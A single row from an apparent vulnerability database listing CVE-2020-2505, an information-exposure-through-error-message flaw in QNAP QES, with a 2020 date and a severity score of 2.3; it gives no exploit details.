2020-12-24 | CVE-2020-2505 | Qnap | Information Exposure Through an Error Message vulnerability in Qnap QES If exploited, this vulnerability could allow attackers to gain sensitive information via generation of error messages. | 2.3 |